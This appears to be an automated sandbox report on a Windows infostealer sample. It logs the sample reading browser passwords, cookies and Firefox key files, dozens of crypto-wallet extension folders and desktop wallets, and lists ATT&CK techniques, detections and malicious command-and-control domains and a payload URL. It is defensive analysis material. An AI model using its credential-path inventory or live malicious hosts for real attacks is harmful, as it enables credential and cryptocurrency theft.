            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: Yara matchFile source: 00000000.00000003.2109025654.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2047895293.00000000057B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 5508, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            Registry Run Keys / Startup Folder
            12
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            1
            Query Registry
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            Registry Run Keys / Startup Folder
            34
            Virtualization/Sandbox Evasion
            LSASS Memory751
            Security Software Discovery
            Remote Desktop Protocol21
            Data from Local System
            13
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)1
            DLL Side-Loading
            12
            Process Injection
            Security Account Manager34
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput Capture115
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Software Packing
            Cached Domain Credentials223
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550148 Sample: file.exe Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 28 thumbystriw.store 2->28 30 presticitpo.store 2->30 32 4 other IPs or domains 2->32 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus detection for URL or domain 2->48 50 8 other signatures 2->50 8 file.exe 12 2->8         started        signatures3 process4 dnsIp5 34 185.215.113.16, 49718, 49719, 80 WHOLESALECONNECTIONSNL Portugal 8->34 36 founpiuer.store 104.21.5.155, 443, 49704, 49705 CLOUDFLARENETUS United States 8->36 52 Detected unpacking (changes PE section rights) 8->52 54 Query firmware table information (likely to detect VMs) 8->54 56 Tries to detect sandboxes and other dynamic analysis tools (window names) 8->56 58 7 other signatures 8->58 12 chrome.exe 9 8->12         started        15 chrome.exe 8->15         started        signatures6 process7 dnsIp8 38 192.168.2.5, 443, 49322, 49703 unknown unknown 12->38 40 192.168.2.17 unknown unknown 12->40 42 239.255.255.250 unknown Reserved 12->42 17 chrome.exe 12->17         started        20 chrome.exe 15->20         started        process9 dnsIp10 22 s-part-0017.t-0009.t-msedge.net 13.107.246.45, 443, 49720, 49721 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->22 24 s-part-0017.t-0009.fb-t-msedge.net 13.107.253.45, 443, 49787, 49800 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->24 26 12 other IPs or domains 17->26

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            file.exe39%ReversingLabsWin32.Trojan.Generic
            file.exe100%AviraTR/Crypt.TPM.Gen
            file.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://go.microsof0%Avira URL Cloudsafe
            https://founpiuer.store/apiW100%Avira URL Cloudmalware
            https://founpiuer.store/apider100%Avira URL Cloudmalware
            http://185.215.113.16/off/def.exe.exe100%Avira URL Cloudphishing
            NameIPActiveMaliciousAntivirus DetectionReputation
            s-part-0044.t-0009.fb-t-msedge.net
            13.107.253.72
            truefalse
              high
              founpiuer.store
              104.21.5.155
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  s-part-0017.t-0009.fb-t-msedge.net
                  13.107.253.45
                  truefalse
                    high
                    www.google.com
                    216.58.206.68
                    truefalse
                      high
                      js.monitor.azure.com
                      unknown
                      unknownfalse
                        high
                        presticitpo.store
                        unknown
                        unknownfalse
                          high
                          thumbystriw.store
                          unknown
                          unknownfalse
                            high
                            mdec.nelreports.net
                            unknown
                            unknownfalse
                              high
                              necklacedmny.store
                              unknown
                              unknownfalse
                                high
                                crisiwarny.store
                                unknown
                                unknownfalse
                                  high
                                  fadehairucw.store
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    presticitpo.storefalse
                                      high
                                      necklacedmny.storefalse
                                        high
                                        fadehairucw.storefalse
                                          high
                                          founpiuer.storefalse
                                            high
                                            crisiwarny.storefalse
                                              high
                                              https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                                high
                                                scriptyprefej.storefalse
                                                  high
                                                  navygenerayk.storefalse
                                                    high
                                                    thumbystriw.storefalse
                                                      high
                                                      https://founpiuer.store/apifalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_129.5.drfalse
                                                          high
                                                          https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000000.00000003.2029094073.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.cloudflare.com/learning/access-mana1file.exe, 00000000.00000003.2029739243.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_129.5.drfalse
                                                                    high
                                                                    https://www.linkedin.com/cws/share?url=$chromecache_115.5.dr, chromecache_95.5.drfalse
                                                                      high
                                                                      https://founpiuer.store/apiWfile.exe, 00000000.00000003.2029250891.0000000000D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/Youssef1313chromecache_129.5.drfalse
                                                                          high
                                                                          https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_115.5.dr, chromecache_95.5.drfalse
                                                                            high
                                                                            https://aka.ms/msignite_docs_bannerchromecache_115.5.dr, chromecache_95.5.drfalse
                                                                              high
                                                                              https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_95.5.drfalse
                                                                                high
                                                                                https://www.amazon.com/?tag=admarketus-20&re0file.exe, 00000000.00000003.2105490606.0000000000D64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://polymer.github.io/AUTHORS.txtchromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                    high
                                                                                    https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_129.5.drfalse
                                                                                      high
                                                                                      https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                        high
